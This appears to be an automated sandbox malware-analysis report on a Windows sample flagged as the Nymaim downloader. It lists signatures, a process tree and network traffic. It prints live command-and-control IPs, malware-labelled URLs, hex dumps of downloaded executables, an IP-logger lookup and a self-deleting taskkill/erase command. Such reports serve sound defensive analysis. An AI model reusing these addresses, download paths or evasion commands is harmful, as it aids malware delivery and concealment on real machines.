Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample Name:file.exe
Analysis ID:715158
MD5:526fde9e61b1b4835885973331fa1616
SHA1:ebbb0c3586b8a0244585eacb44ca125ac933ad8e
SHA256:093741e4079a8092ba9d94653cb4f11c15fbe1e9ef53690e91628c61f0cc9440
Tags:exe
Infos:

Detection

Nymaim
Score:88
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Yara detected Nymaim
Antivirus detection for URL or domain
Multi AV Scanner detection for dropped file
Binary is likely a compiled AutoIt script file
Machine Learning detection for sample
May check the online IP address of the machine
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
One or more processes crash
May sleep (evasive loops) to hinder dynamic analysis
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Found dropped PE file which has not been started or loaded
PE file contains executable resources (Code or Archives)
IP address seen in connection with other malware
Downloads executable code via HTTP
Enables debug privileges
Drops files with a non-matching file extension (content does not match file extension)
Sample file is different than original file name gathered from version info
Drops PE files
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Binary contains a suspicious time stamp
Uses taskkill to terminate processes
Dropped file seen in connection with other malware
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 3196 cmdline: C:\Users\user\Desktop\file.exe MD5: 526FDE9E61B1B4835885973331FA1616)
    • WerFault.exe (PID: 4088 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3196 -s 528 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • WerFault.exe (PID: 1364 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3196 -s 700 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • WerFault.exe (PID: 6080 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3196 -s 724 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • WerFault.exe (PID: 6064 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3196 -s 760 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • WerFault.exe (PID: 5216 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3196 -s 768 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • WerFault.exe (PID: 4072 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3196 -s 848 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • WerFault.exe (PID: 2008 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3196 -s 840 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • WerFault.exe (PID: 6036 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3196 -s 1032 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • WerFault.exe (PID: 5204 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3196 -s 1292 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • cmd.exe (PID: 5760 cmdline: C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exe MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 4744 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • Cleaner.exe (PID: 5208 cmdline: "C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exe" MD5: 04514BD4962F7D60679434E0EBE49184)
    • WerFault.exe (PID: 3608 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3196 -s 1552 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • cmd.exe (PID: 1388 cmdline: "C:\Windows\System32\cmd.exe" /c taskkill /im "file.exe" /f & erase "C:\Users\user\Desktop\file.exe" & exit MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 4392 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • taskkill.exe (PID: 2324 cmdline: taskkill /im "file.exe" /f MD5: 15E2E0ACD891510C6268CB8899F2A1A1)
  • cleanup

Malware Configuration

Threatname: Nymaim

{"C2 addresses": ["208.67.104.97", "85.31.46.167"]}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000000.309205181.00000000021C0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_NymaimYara detected NymaimJoe Security
    00000000.00000000.309205181.00000000021C0000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_3687686funknownunknown
    • 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
    00000000.00000000.324269337.00000000021C0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_NymaimYara detected NymaimJoe Security
      00000000.00000000.324269337.00000000021C0000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_3687686funknownunknown
      • 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
      00000000.00000000.303645653.00000000021C0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_NymaimYara detected NymaimJoe Security
        Click to see the 60 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        0.0.file.exe.400000.5.unpackJoeSecurity_NymaimYara detected NymaimJoe Security
          0.0.file.exe.21c0e67.20.raw.unpackJoeSecurity_NymaimYara detected NymaimJoe Security
            0.0.file.exe.21c0e67.26.raw.unpackJoeSecurity_NymaimYara detected NymaimJoe Security
              0.0.file.exe.400000.23.unpackJoeSecurity_NymaimYara detected NymaimJoe Security
                0.0.file.exe.21c0e67.14.raw.unpackJoeSecurity_NymaimYara detected NymaimJoe Security
                  Click to see the 62 entries

                  Sigma Signatures

                  No Sigma rule has matched

                  Snort Signatures

                  No Snort rule has matched

                  Joe Sandbox Signatures

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Antivirus detection for URL or domain
                  Source: http://208.67.104.97/powfhxhxcjzx/ping.php?sub=NOSUB&stream=start&substream=mixinteURL Reputation: Label: malware
                  Source: http://208.67.104.97/powfhxhxcjzx/ping.php?sub=NOSUB&stream=mixtwo&substream=mixinteURL Reputation: Label: malware
                  Source: http://208.67.104.97/powfhxhxcjzx/ping.php?sub=NOSUB&stream=start&substURL Reputation: Label: malware
                  Source: http://171.22.30.106/library.phpURL Reputation: Label: malware
                  Multi AV Scanner detection for dropped file
                  Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\soft[1]ReversingLabs: Detection: 28%
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeReversingLabs: Detection: 28%
                  Machine Learning detection for sample
                  Source: file.exeJoe Sandbox ML: detected
                  Source: 00000000.00000000.309205181.00000000021C0000.00000040.00001000.00020000.00000000.sdmpMalware Configuration Extractor: Nymaim {"C2 addresses": ["208.67.104.97", "85.31.46.167"]}
                  Source: file.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: C:\Users\user\Desktop\file.exeFile opened: C:\Windows\SysWOW64\msvcr100.dll
                  Source: unknownHTTPS traffic detected: 148.251.234.83:443 -> 192.168.2.5:49701 version: TLS 1.2
                  Source: Binary string: ^\C:\car.pdb source: file.exe
                  Source: Binary string: C:\car.pdb source: file.exe

                  Networking

                  barindex
                  May check the online IP address of the machine
                  Source: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exeDNS query: name: iplogger.org
                  C2 URLs / IPs found in malware configuration
                  Source: Malware configuration extractorIPs: 208.67.104.97
                  Source: Malware configuration extractorIPs: 85.31.46.167
                  Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                  Source: Joe Sandbox ViewIP Address: 148.251.234.83 148.251.234.83
                  Source: Joe Sandbox ViewIP Address: 148.251.234.83 148.251.234.83
                  Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 03 Oct 2022 15:29:59 GMTServer: Apache/2.4.41 (Ubuntu)Pragma: publicExpires: 0Cache-Control: must-revalidate, post-check=0, pre-check=0Cache-Control: privateContent-Disposition: attachment; filename="dll";Content-Transfer-Encoding: binaryContent-Length: 242176Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 4a 6c ef 58 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0b 00 00 a8 03 00 00 08 00 00 00 00 00 00 2e c6 03 00 00 20 00 00 00 e0 03 00 00 00 00 10 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 04 00 00 02 00 00 00 00 00 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 c5 03 00 57 00 00 00 00 e0 03 00 10 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 34 a6 03 00 00 20 00 00 00 a8 03 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 10 04 00 00 00 e0 03 00 00 06 00 00 00 aa 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 04 00 00 02 00 00 00 b0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 c6 03 00 00 00 00 00 48 00 00 00 02 00 05 00 a0 60 02 00 34 65 01 00 01 00 00 00 00 00 00 00 90 55 01 00 10 0b 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 7d 00 59 00 79 00 3d 00 7b 00 58 00 78 00 3d 00 8a 72 93 00 00 70 04 6f 32 00 00 0a 8c 6f 00 00 01 28 33 00 00 0a 02 04 6f 32 00 00 0a 7d 05 00 00 04 2a 3a 02 03 73 01 00 00 06 04 28 02 00 00 06 2a 1e 17 80 06 00 00 04 2a 32 72 df 00 00 70 28 3b 00 00 0a 26 2a 56 72 a8 0f 00 70 80 07 00 00 04 72 a8 0f 00 70 80 08 00 00 04 2a 1e 02 28 1f 00 00 0a 2a 3e 02 fe 15 06 00 00 02 02 03 7d 09 00 00 04 2a be 02 03 28 43 00 00 0a 04 d6 8c 6f 00 00 01 28 44 00 00 0a 28 45 00 00 0a 7d 09 00 00 04 02 28 46 00 00 0a 28 45 00 00 0a 28 47 00 00 0a 26 2a 3e 02 fe 15 07 00 00 02 02 03 7d 0e 00 00 04 2a aa 02 03 28 43 00 00 0a 04 d6 8c 6f 00 00 01 28 44 00 00 0a 7d 0e 00 00 04 02 28 46 00 00 0a 28 45 00 00 0a 28 48 00 00 0a 26 2a 22 02 fe 15 08 00 00 02 2a 3e 02 fe 15 09 00 00 02 02 03 7d 18 00 00 04 2a 52 02 03 7d 20 00
                  Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 03 Oct 2022 15:29:59 GMTServer: Apache/2.4.41 (Ubuntu)Pragma: publicExpires: 0Cache-Control: must-revalidate, post-check=0, pre-check=0Cache-Control: privateContent-Disposition: attachment; filename="soft";Content-Transfer-Encoding: binaryContent-Length: 3947920Keep-Alive: timeout=5, max=99Connection: Keep-AliveContent-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 f1 9a e4 ea 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 e4 14 00 00 0c 00 00 00 00 00 00 a6 02 15 00 00 20 00 00 00 20 15 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 60 15 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 54 02 15 00 4f 00 00 00 00 20 15 00 32 09 00 00 00 00 00 00 00 00 00 00 00 28 3c 00 90 15 00 00 00 40 15 00 0c 00 00 00 38 02 15 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 ac e2 14 00 00 20 00 00 00 e4 14 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 32 09 00 00 00 20 15 00 00 0a 00 00 00 e6 14 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 40 15 00 00 02 00 00 00 f0 14 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 88 02 15 00 00 00 00 00 48 00 00 00 02 00 05 00 68 81 00 00 40 45 00 00 01 00 00 00 54 00 00 06 a8 c6 00 00 90 3b 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1e 02 28 13 00 00 0a 2a 1e 02 28 13 00 00 0a 2a ae 7e 01 00 00 04 2d 1e 72 01 00 00 70 d0 03 00 00 02 28 14 00 00 0a 6f 15 00 00 0a 73 16 00 00 0a 80 01 00 00 04 7e 01 00 00 04 2a 1a 7e 02 00 00 04 2a 1e 02 80 02 00 00 04 2a 6a 28 03 00 00 06 72 3d 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 4d 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 b7 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 cb 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 d9 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 eb 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 1f 01 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 1a 7e 03 00 00 04 2
                  Source: global trafficHTTP traffic detected: GET /1Pz8p7 HTTP/1.1User-Agent: Mozilla/5.0 (Linux; Android 9; SM-G973U Build/PPR1.180610.011) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Mobile Safari/537.36Host: iplogger.orgConnection: Keep-Alive
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
                  Source: unknownTCP traffic detected without corresponding DNS query: 208.67.104.97
                  Source: unknownTCP traffic detected without corresponding DNS query: 208.67.104.97
                  Source: unknownTCP traffic detected without corresponding DNS query: 208.67.104.97
                  Source: unknownTCP traffic detected without corresponding DNS query: 208.67.104.97
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.31.46.167
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.31.46.167
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.31.46.167
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.31.46.167
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.31.46.167
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.31.46.167
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.31.46.167
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.31.46.167
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.31.46.167
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.31.46.167
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.31.46.167
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.31.46.167
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.31.46.167
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.31.46.167
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.31.46.167
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.31.46.167
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.31.46.167
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.31.46.167
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.31.46.167
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.31.46.167
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.31.46.167
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.31.46.167
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.31.46.167
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.31.46.167
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.31.46.167
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.31.46.167
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.31.46.167
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.31.46.167
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.31.46.167
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.31.46.167
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.31.46.167
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.31.46.167
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.31.46.167
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.31.46.167
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.31.46.167
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.31.46.167
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.31.46.167
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.31.46.167
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.31.46.167
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.31.46.167
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.31.46.167
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.31.46.167
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.31.46.167
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.31.46.167
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.31.46.167
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.31.46.167
                  Source: file.exe, 00000000.00000000.352480046.000000000019B000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://208.67.104.97/powfhxhxcjzx/ping.php?sub=NOSUB&stream=start&subst
                  Source: Cleaner.exe, 00000016.00000002.574678173.000001CFE5BF0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                  Source: Cleaner.exe, 00000016.00000002.568193872.000001CFE2DA2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://fontfabrik.com
                  Source: Cleaner.exe, 00000016.00000002.565434475.000001CFC95D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://iplogger.org
                  Source: Cleaner.exe, 00000016.00000002.565355076.000001CFC95BB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: Cleaner.exe, 00000016.00000002.568193872.000001CFE2DA2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                  Source: Cleaner.exe, 00000016.00000002.568193872.000001CFE2DA2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
                  Source: file.exe, 00000000.00000003.396800531.0000000003B36000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.364648566.00000000031C8000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.390225598.0000000003712000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.393566637.000000000371E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.395142031.0000000003B1B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.392148582.00000000038FD000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.389580944.0000000003AC7000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.398066889.0000000003B63000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.394103173.0000000003913000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.392869347.0000000003AEF000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.397700050.0000000003934000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.396385601.0000000003924000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.395883295.000000000371B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.397228041.0000000003718000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.399409682.0000000003716000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.365552738.0000000003080000.00000004.00000800.00020000.00000000.sdmp, soft[1].0.dr, Cleaner.exe.0.drString found in binary or memory: http://www.ccleaner.comqhttps://take.rdrct-now.online/go/ZWKA?p78705p298845p1174
                  Source: Cleaner.exe, 00000016.00000003.437639112.000001CFE1B2E000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000016.00000002.568193872.000001CFE2DA2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
                  Source: Cleaner.exe, 00000016.00000003.437840133.000001CFE1B2E000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000016.00000003.437639112.000001CFE1B2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com(
                  Source: Cleaner.exe, 00000016.00000003.439359814.000001CFE1B4E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                  Source: Cleaner.exe, 00000016.00000003.436930103.000001CFE1B4E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/
                  Source: Cleaner.exe, 00000016.00000002.568193872.000001CFE2DA2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                  Source: Cleaner.exe, 00000016.00000002.568193872.000001CFE2DA2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                  Source: Cleaner.exe, 00000016.00000003.438267437.000001CFE1B50000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000016.00000002.568193872.000001CFE2DA2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
                  Source: Cleaner.exe, 00000016.00000002.568193872.000001CFE2DA2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                  Source: Cleaner.exe, 00000016.00000002.568193872.000001CFE2DA2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                  Source: Cleaner.exe, 00000016.00000002.568193872.000001CFE2DA2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                  Source: Cleaner.exe, 00000016.00000003.447075330.000001CFE1B4E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designerso
                  Source: Cleaner.exe, 00000016.00000003.439268166.000001CFE1B4E000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000016.00000003.439104249.000001CFE1B4E000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000016.00000003.439219729.000001CFE1B4E000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000016.00000003.439012764.000001CFE1B4E000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000016.00000003.438961213.000001CFE1B4E000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000016.00000003.439161982.000001CFE1B4E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersp
                  Source: Cleaner.exe, 00000016.00000003.436987400.000001CFE1B2F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comH_
                  Source: Cleaner.exe, 00000016.00000002.568193872.000001CFE2DA2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
                  Source: Cleaner.exe, 00000016.00000003.430687491.000001CFE1B30000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000016.00000003.430832292.000001CFE1B30000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000016.00000003.430600821.000001CFE1B30000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000016.00000003.430933717.000001CFE1B30000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000016.00000003.430979463.000001CFE1B30000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000016.00000003.430553370.000001CFE1B30000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000016.00000003.430753328.000001CFE1B30000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000016.00000003.431021568.000001CFE1B30000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000016.00000002.568193872.000001CFE2DA2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                  Source: Cleaner.exe, 00000016.00000003.431228141.000001CFE1B30000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000016.00000003.431179686.000001CFE1B2A000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000016.00000003.430147464.000001CFE1B30000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/
                  Source: Cleaner.exe, 00000016.00000002.568193872.000001CFE2DA2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                  Source: Cleaner.exe, 00000016.00000002.568193872.000001CFE2DA2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                  Source: Cleaner.exe, 00000016.00000003.430832292.000001CFE1B30000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000016.00000003.430600821.000001CFE1B30000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000016.00000003.430979463.000001CFE1B30000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000016.00000003.430553370.000001CFE1B30000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cn
                  Source: Cleaner.exe, 00000016.00000002.568193872.000001CFE2DA2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                  Source: Cleaner.exe, 00000016.00000002.568193872.000001CFE2DA2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                  Source: Cleaner.exe, 00000016.00000002.568193872.000001CFE2DA2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
                  Source: Cleaner.exe, 00000016.00000003.434754929.000001CFE1B28000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000016.00000003.434233291.000001CFE1B29000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000016.00000003.434991979.000001CFE1B2E000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000016.00000002.568193872.000001CFE2DA2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
